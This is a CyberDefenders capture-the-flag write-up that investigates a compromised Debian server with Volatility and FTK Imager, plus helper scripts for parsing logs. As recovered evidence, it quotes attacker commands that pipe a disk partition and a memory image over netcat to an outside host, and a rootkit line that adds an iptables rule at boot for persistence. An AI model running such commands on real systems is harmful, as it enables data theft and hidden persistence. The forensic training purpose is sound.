Ulysses Lab

CyberDefenders Memory Forensic Lab

Scenario

A research server was flagged for suspicious activity after multiple failed authentication attempts. Analysts detected a brute-force attack, unauthorized outbound connections, and possible persistence mechanisms. Using Volatility, a custom Debian5_26 profile was loaded to analyze memory dumps and identify malicious processes. Your task is to investigate forensic artifacts, determine the attacker’s entry point, and uncover any deployed payloads.

Question 1

The attacker was performing a Brute Force attack. What account triggered the alert?

Answer 1

After loading victoria-v8.sda1.img into FTK Imager I went looking for log files and found them under /var/log/, starting with auth.log. This gave me a few user names, one of which was an invalid user named ‘ulysses’ with several failed password attempts against it. (sshd logs "invalid user" when the account does not exist on the system at all, which is typical of a wordlist-driven brute force rather than password guessing against a known account.)

Question 2

While investigating the logs, how many failed login attempts were alerted by the same user?

Answer 2

Ctrl+F was my best friend here: in the same auth.log window I searched for each failed attempt for that user and counted them, totalling 32. Count only the "Failed password for invalid user ulysses" lines; sshd also writes a separate "Invalid user ulysses" line for each attempt, so matching on the user name alone roughly doubles the count.
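Counting by hand works for one user and a few dozen lines, but the same check is easy to script and then covers every user and source address at once. The following is an added example, not code from the writeup or the lab; the auth.log lines it parses are constructed in the standard Debian sshd format (hostname, PIDs, ports and timestamps are made up), and the `threshold` value is an arbitrary choice:

```python
import re
from collections import Counter

# Constructed sample of /var/log/auth.log in Debian's sshd format. These lines
# are made up for illustration and are not taken from the lab image.
SAMPLE_AUTH_LOG = """\
Feb  6 12:01:10 victoria sshd[2110]: Invalid user ulysses from 192.168.56.1
Feb  6 12:01:12 victoria sshd[2110]: Failed password for invalid user ulysses from 192.168.56.1 port 41127 ssh2
Feb  6 12:01:15 victoria sshd[2112]: Failed password for invalid user ulysses from 192.168.56.1 port 41128 ssh2
Feb  6 12:01:18 victoria sshd[2114]: Failed password for root from 192.168.56.1 port 41130 ssh2
Feb  6 12:01:20 victoria sshd[2116]: Failed password for invalid user ulysses from 192.168.56.1 port 41131 ssh2
Feb  6 12:02:02 victoria sshd[2118]: Accepted password for yom from 192.168.56.101 port 41140 ssh2
"""

# "Failed password for [invalid user ]<user> from <ip> port <n> ssh2"
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)
# "Invalid user <user> from <ip>" is logged once per attempt against a
# non-existent account; it is counted separately so attempts are not doubled.
INVALID_RE = re.compile(r"sshd\[\d+\]: Invalid user (?P<user>\S+) from ")


def count_failed_logins(text):
    """Map (user, source_ip) -> number of 'Failed password' lines."""
    hits = Counter()
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            hits[(m.group("user"), m.group("src"))] += 1
    return hits


def invalid_users(text):
    """Account names sshd rejected because they do not exist on the host."""
    return {m.group("user") for m in map(INVALID_RE.search, text.splitlines()) if m}


def top_targets(text, threshold=3):
    """(user, source_ip, count) tuples at or above threshold, most attempts first.
    threshold is an arbitrary cut-off for this example."""
    return [(user, src, n)
            for (user, src), n in count_failed_logins(text).most_common()
            if n >= threshold]


if __name__ == "__main__":
    print("non-existent accounts tried:", sorted(invalid_users(SAMPLE_AUTH_LOG)))
    for user, src, n in top_targets(SAMPLE_AUTH_LOG):
        print(f"{n:4d} failed logins for {user!r} from {src}")
```

Run it against the real auth.log by reading the file into `count_failed_logins`; the per-(user, source) counter also answers where the attempts came from, which the manual count does not.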


Question 3

What kind of system runs on the targeted server?

Answer 3

After a bit of research, there are two places where the OS version is normally recorded on a Linux file system: /etc/os-release on newer systems, and /etc/issue (the pre-login banner) on older ones. Debian 5.0 predates os-release, so the answer was in /etc/issue:

Debian GNU/Linux 5.0

Question 4

What is the victim’s IP address?

Answer 4

I needed to look for network-related messages, which on Linux end up in /var/log/syslog. That led me to the machine's IP address: 192.168.56.102.


Question 5

What are the attacker’s two IP addresses?

Answer 5

Searching through the various log files I stumbled across mainlog, the Exim log (/var/log/exim4/mainlog on Debian). It showed the two IP addresses the attacker was using to hit the mail server and try to get a reverse shell: 192.168.56.101 and 192.168.56.1.


Question 6

What is the nc service PID number that was running on the server?

Answer 6

This took quite a bit of time to work out. Using the profile provided I managed to get Volatility 2 working. However, you have to use the following syntax (the profile name exactly as the provided profile is called, and the Linux plugins with their linux_ prefix) to get commands working:

python2 vol.py --profile=LinuxDebian5_26x86 -f [MEMDUMP] linux_[COMMAND]

Now I was able to look up the processes and services asked in the question.

┌──(zero㉿kali)-[~/Documents/volatility-master]
└─$ python2 vol.py --profile=LinuxDebian5_26x86 -f dump/memdump.img linux_psxview | grep nc
Volatility Foundation Volatility Framework 2.6
0x0f43e8c0 nc                     2169 True   True   False    True       False   False  
0x0f46c100 nc                     2161 False  True   False    False      False   False 

This gave me two different PIDs; the first one, 2169, is the correct one. Running the command without grep shows the column headers: the first True/False column is pslist, i.e. whether the task was found by walking the kernel's task list (what linux_pslist reports). PID 2169 is in pslist; 2161 is not, and is only visible through the other views, which is exactly the disagreement psxview exists to surface.
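The point of a cross-view plugin is to compare the columns, not just read the first one. As an added example (not part of the writeup or of Volatility), the following parses linux_psxview output and flags tasks that one view sees but pslist does not. It assumes only what the text above states, that the first True/False column is pslist; the remaining boolean columns are treated generically, and the banner and `init` row in the sample are constructed, while the two `nc` rows are the ones quoted above:

```python
import re

# Constructed sample of `linux_psxview` output: the two nc rows are the ones
# from the writeup, the banner and the init row are made up for illustration.
SAMPLE_PSXVIEW = """\
Volatility Foundation Volatility Framework 2.6
0x0f000000 init                      1 True   True   True     True       True    True
0x0f43e8c0 nc                     2169 True   True   False    True       False   False
0x0f46c100 nc                     2161 False  True   False    False      False   False
"""

# offset, task name, PID, then one or more True/False view columns
ROW_RE = re.compile(
    r"^(?P<off>0x[0-9a-fA-F]+)\s+(?P<name>\S+)\s+(?P<pid>\d+)\s+"
    r"(?P<flags>(?:(?:True|False)\s*)+)$"
)


def parse_psxview(text):
    """Return one dict per task row; 'flags' is the list of view booleans,
    with flags[0] being pslist as the writeup describes."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # banner, header or separator lines
        rows.append({
            "offset": m.group("off"),
            "name": m.group("name"),
            "pid": int(m.group("pid")),
            "flags": [f == "True" for f in m.group("flags").split()],
        })
    return rows


def pids_in_pslist(rows, name):
    """PIDs of tasks called `name` that the task-list walk can see."""
    return [r["pid"] for r in rows if r["name"] == name and r["flags"][0]]


def hidden_from_pslist(rows):
    """PIDs absent from pslist but present in at least one other view:
    either a task unlinked from the task list or a stale structure."""
    return [r["pid"] for r in rows if not r["flags"][0] and any(r["flags"][1:])]


if __name__ == "__main__":
    rows = parse_psxview(SAMPLE_PSXVIEW)
    print("nc in pslist:", pids_in_pslist(rows, "nc"))
    print("not in pslist but seen elsewhere:", hidden_from_pslist(rows))
```

A caveat when reading the other columns: on an old profile like this one some views can come back False for every task (a failed kmem_cache walk, for example), so judge a row against the rest of the table rather than expecting all True for a legitimate process.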

Question 7

What service was exploited to gain access to the system?

Answer 7

I needed a little hint for this task. After a little research, hunting through the bash history would be a good start, so I used the following:

python2 vol.py --profile=LinuxDebian5_26x86 -f dump/memdump.img linux_bash  

I found a ton of references to a service called exim4: specifically, removing any trace of the current installation, then copying a specific version over from the attacker's own machine and installing it.

Question 8

What is the CVE number of exploited vulnerability?

Answer 8

Looking through exploit-db for exim4, there was a single matching result: a heap buffer overflow in Exim's string_vformat function affecting versions up to and including 4.69, which is exactly the version the attacker copied over from their own machine (the exim4-*_4.69-9 packages in the history below). That vulnerability is CVE-2010-4344.

2011-02-06 14:04:39 UTC+0000   mkdir exim4
2011-02-06 14:04:39 UTC+0000   dpkg -i exim4-config_4.69-9_all.deb 
2011-02-06 14:04:39 UTC+0000   cd exim4/
2011-02-06 14:04:39 UTC+0000   scp yom@192.168.56.1:/home/yom/temporary/exmi4/* .
2011-02-06 14:04:39 UTC+0000   dpkg -i exim4-base_4.69-9_i386.deb

(The "exmi4" in the scp path is the attacker's own typo, reproduced as it appears in the history.) The identical 14:04:39 timestamps are an artifact, not evidence that these ran in the same second: entries bash reloads from ~/.bash_history at shell start all carry the shell's start time, so treat them as "at or before 14:04:39" and rely on history order rather than the clock for sequencing.


Question 9

During this attack, the attacker downloaded two files to the server. Provide the name of the compressed file.

Answer 9

Temporary directories are a good place to start, usually /tmp/. From the previous answers I could see the attacker had already been working there, which prompted me to list the cached file system with the following:

└─$ python2 vol.py --profile=LinuxDebian5_26x86 -f dump/memdump.img linux_enumerate_files | grep tmp
Volatility Foundation Volatility Framework 2.6
   0xcf10b4ac                     36405 /tmp
   0xcf1e2e48                     39467 /tmp/rk.tar
          0x0 ------------------------- /tmp/e.conf
          0x0 ------------------------- /tmp/ccYTefv5.le
          0x0 ------------------------- /tmp/ccCGQiJB.ld
          0x0 ------------------------- /tmp/ccEpMUR7.o
          0x0 ------------------------- /tmp/ccm0efZD.c
          0x0 ------------------------- /tmp/ccOctbQn.o
          0x0 ------------------------- /tmp/ccxikrda.s
   0xcf16a698                     39466 /tmp/c.pl

I can see two files of interest here: rk.tar and c.pl. The answer is rk.tar, the tar archive (the cc*.o, .s, .c and .ld entries look like gcc/collect2 temporaries, a hint that something was compiled on the box). The entries shown at offset 0x0 have no inode recorded, so there is nothing to pull out of memory for them; rk.tar and c.pl do have inodes and can be recovered with linux_find_file.

Question 10

During the investigation, two ports were involved in the process of data exfiltration. Which port did the nc command use for the exfiltration?

Answer 10

Using the bash commands search again, I was able to find the following:

└─$ python2 vol.py --profile=LinuxDebian5_26x86 -f dump/memdump.img linux_bash | grep nc
Volatility Foundation Volatility Framework 2.6
    2042 bash                 2011-02-06 14:04:39 UTC+0000   sudo dd if=/dev/sda | nc 192.168.56.1 4444
    2042 bash                 2011-02-06 14:04:39 UTC+0000   dd if=/dev/sda | nc 192.168.56.1 4444
    2042 bash                 2011-02-06 14:04:39 UTC+0000   dd if=/dev/sda1 | nc 192.168.56.1 4444
    2042 bash                 2011-02-06 14:24:43 UTC+0000   dd if=/dev/sda1 | nc 192.168.56.1 8888
    2042 bash                 2011-02-06 14:42:29 UTC+0000   memdump | nc 192.168.56.1 8888

Two ports appear, 4444 and 8888. The one used last, and the one the disk partition and the memory dump were actually pushed over, is 8888. Note that this is the attacker imaging the victim's own disk (dd if=/dev/sda1) and memory (memdump) and streaming them to 192.168.56.1 with nc, which is why the question calls it exfiltration.
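Grepping for nc finds these lines, but pulling out the destination host and port for every pipeline that ends in nc, and ignoring listener invocations, is what you want when the history is long. The following is an added example, not from the writeup or from Volatility; it parses linux_bash text lines. The first four history lines in the sample are the ones quoted above, the listener and ls lines are constructed for contrast, and the set of netcat binary names it recognises is an assumption:

```python
import re
import shlex

# Constructed sample of `linux_bash` output. The four dd/memdump lines are the
# ones from the writeup; the last two lines are made up to show what is ignored.
SAMPLE_BASH = """\
Volatility Foundation Volatility Framework 2.6
    2042 bash                 2011-02-06 14:04:39 UTC+0000   sudo dd if=/dev/sda | nc 192.168.56.1 4444
    2042 bash                 2011-02-06 14:04:39 UTC+0000   dd if=/dev/sda1 | nc 192.168.56.1 4444
    2042 bash                 2011-02-06 14:24:43 UTC+0000   dd if=/dev/sda1 | nc 192.168.56.1 8888
    2042 bash                 2011-02-06 14:42:29 UTC+0000   memdump | nc 192.168.56.1 8888
    2042 bash                 2011-02-06 14:50:00 UTC+0000   cat /etc/passwd | nc -l -p 4444
    2042 bash                 2011-02-06 14:51:00 UTC+0000   ls -la /tmp
"""

# "<pid> <name> <YYYY-MM-DD HH:MM:SS UTC+0000> <command>"
LINE_RE = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<name>\S+)\s+"
    r"(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} UTC[+-]\d{4})\s+(?P<cmd>.*)$"
)
NETCAT_NAMES = {"nc", "netcat", "ncat"}  # assumption: names to treat as netcat


def parse_linux_bash(text):
    """Yield (pid, timestamp, command) for each history line."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            out.append((int(m.group("pid")), m.group("ts"), m.group("cmd").rstrip()))
    return out


def nc_exfil_events(text):
    """(timestamp, producer_command, host, port) for every pipeline stage whose
    output is piped into an outbound netcat (host and port given, no -l)."""
    events = []
    for _pid, ts, cmd in parse_linux_bash(text):
        stages = [s.strip() for s in cmd.split("|")]
        if len(stages) < 2:
            continue  # nothing piped into anything
        for producer, consumer in zip(stages, stages[1:]):
            try:
                argv = shlex.split(consumer)
            except ValueError:
                continue  # unbalanced quotes; not a clean nc invocation
            if not argv or argv[0].rsplit("/", 1)[-1] not in NETCAT_NAMES:
                continue
            if "-l" in argv:
                continue  # listener, not an outbound connection
            positional = [a for a in argv[1:] if not a.startswith("-")]
            if len(positional) >= 2 and positional[-1].isdigit():
                events.append((ts, producer, positional[-2], int(positional[-1])))
    return events


def exfil_ports(text):
    return sorted({port for _ts, _src, _host, port in nc_exfil_events(text)})


def last_exfil_port(text):
    events = nc_exfil_events(text)
    return events[-1][3] if events else None


if __name__ == "__main__":
    for ts, producer, host, port in nc_exfil_events(SAMPLE_BASH):
        print(f"{ts}  {producer!r:28} -> {host}:{port}")
    print("ports used:", exfil_ports(SAMPLE_BASH), "last:", last_exfil_port(SAMPLE_BASH))
```

The producer string tells you what left the box (a whole partition, then the memory image), which is the part worth recording in the timeline alongside the port.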

Question 11

Which port did the attacker try to block on the firewall?

Answer 11

After finding the rk.tar and c.pl files within the file system in FTK Imager, a quick look inside rk.tar shows an install.sh script which references port 45295.

The file attempts to modify system files and set up persistence.

echo "/usr/sbin/iptables -I OUTPUT 1 -p tcp --dport 45295 -j DROP" >> /etc/init.d/boot.local

Reading into how this command works: the line appends an iptables rule (iptables being the Linux firewall utility) to /etc/init.d/boot.local, so it is re-applied on every boot. -I OUTPUT 1 inserts the rule at position 1 of the OUTPUT chain, ahead of every existing rule, so it wins regardless of what follows; -p tcp --dport 45295 matches outgoing TCP packets whose destination port is 45295 (not packets coming from that port, since OUTPUT only sees traffic the host itself sends); -j DROP discards them silently, with no reset or ICMP error back to the sender.

This was a rather challenging box. I had to look up various ways to use the provided profile within Volatility 2, and I have since found Volatility 3 much easier to work with. An enjoyable challenge with a little head scratching, and I feel like I learned a lot.
